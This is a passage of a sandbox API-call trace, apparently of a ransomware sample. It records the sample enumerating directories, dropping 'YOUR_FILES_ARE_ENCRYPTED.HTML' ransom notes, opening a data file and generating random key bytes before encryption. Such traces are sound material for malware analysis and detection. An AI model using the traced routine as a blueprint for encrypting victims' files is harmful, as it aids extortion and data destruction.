lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AppData\\*" [0120.353] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x998c3a7f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x998c3a7f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x998c3a7f, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.353] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x998c3a7f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x998c3a7f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x998c3a7f, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="..", cAlternateFileName="")) returned 1 [0120.353] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x998c3a7f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x998c3a7f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x998c3a7f, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="..", cAlternateFileName="")) returned 0 [0120.353] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.353] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0120.353] GetProcessHeap () returned 0x600000 [0120.353] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsfeedback_cw5n1h2txyewy\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.355] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.355] CloseHandle (hObject=0x31c) returned 1 [0120.356] GetProcessHeap () returned 0x600000 [0120.356] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.356] GetProcessHeap () returned 0x600000 [0120.356] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.356] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x998c3a7f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x998c3a7f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x998c3a7f, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0120.356] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.356] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\LocalCache") returned 99 [0120.356] GetProcessHeap () returned 0x600000 [0120.356] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.356] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\LocalCache" [0120.356] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\LocalCache\\*" [0120.356] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x998c3a7f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x998c3a7f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x998c3a7f, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.356] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x998c3a7f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x998c3a7f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x998c3a7f, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="..", cAlternateFileName="")) returned 1 [0120.356] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x998c3a7f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x998c3a7f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x998c3a7f, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="..", cAlternateFileName="")) returned 0 [0120.357] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.357] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0120.357] GetProcessHeap () returned 0x600000 [0120.357] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.357] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsfeedback_cw5n1h2txyewy\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.357] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.358] CloseHandle (hObject=0x31c) returned 1 [0120.358] GetProcessHeap () returned 0x600000 [0120.358] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.358] GetProcessHeap () returned 0x600000 [0120.358] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.359] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9989d823, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9989d823, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9989d823, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0120.359] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.359] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\LocalState") returned 99 [0120.359] GetProcessHeap () returned 0x600000 [0120.359] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.359] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\LocalState" [0120.359] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\LocalState\\*" [0120.359] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9989d823, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9989d823, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9989d823, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName=".", cAlternateFileName="")) returned 0x626878 [0120.359] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9989d823, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9989d823, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9989d823, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="..", cAlternateFileName="")) returned 1 [0120.359] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9989d823, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9989d823, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9989d823, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="..", cAlternateFileName="")) returned 0 [0120.359] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0120.359] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0120.359] GetProcessHeap () returned 0x600000 [0120.359] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsfeedback_cw5n1h2txyewy\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.360] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.361] CloseHandle (hObject=0x31c) returned 1 [0120.361] GetProcessHeap () returned 0x600000 [0120.361] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.361] GetProcessHeap () returned 0x600000 [0120.361] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.361] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99e6d249, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x99e6d249, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x99e6d249, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy", cAlternateFileName="MICROS~1.0_N")) returned 1 [0120.361] StrStrIW (lpFirst="Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.361] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy") returned 157 [0120.361] GetProcessHeap () returned 0x600000 [0120.361] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.361] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy" [0120.361] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\*" [0120.361] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99e6d249, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x99e6d249, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x99e6d249, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.361] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99e6d249, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x99e6d249, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x99e6d249, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="..", cAlternateFileName="")) returned 1 [0120.362] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99e6d249, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x99e6d249, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x99e6d249, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da48a, dwReserved1=0x6da3d8, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0120.362] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.362] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore") returned 173 [0120.362] GetProcessHeap () returned 0x600000 [0120.362] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.363] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore" [0120.363] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*" [0120.363] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99e6d249, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x99e6d249, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x99f5217e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6da3e0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.364] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99e6d249, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x99e6d249, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x99f5217e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6da3e0, cFileName="..", cAlternateFileName="")) returned 1 [0120.364] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99e6d249, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9a4af6a9, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9a4af6a9, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x6b4210, dwReserved1=0x6da3e0, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0120.364] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.364] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned 193 [0120.364] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0120.364] lstrlenW (lpString=".dat") returned 4 [0120.364] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0120.364] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0120.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsFeedback_cw5n1h2txyewy\\Microsoft.WindowsFeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsfeedback_cw5n1h2txyewy\\microsoft.windowsfeedback_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0120.365] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=16384) returned 1 [0120.365] GetProcessHeap () returned 0x600000 [0120.365] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0120.368] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="62") returned 2 [0120.368] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="1D") returned 2 [0120.368] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="15") returned 2 [0120.368] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="43") returned 2 [0120.368] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="01") returned 2 [0120.368] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="2B") returned 2 [0120.368] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="38") returned 2 [0120.368] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="0E") returned 2 [0120.368] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="BB") returned 2 [0120.368] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="8C") returned 2 [0120.368] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="E8") returned 2 [0120.368] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="48") returned 2 [0120.368] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="B4") returned 2 [0120.368] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="4C") returned 2 [0120.368] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="E9") returned 2 [0120.369] wsprintfW (in: 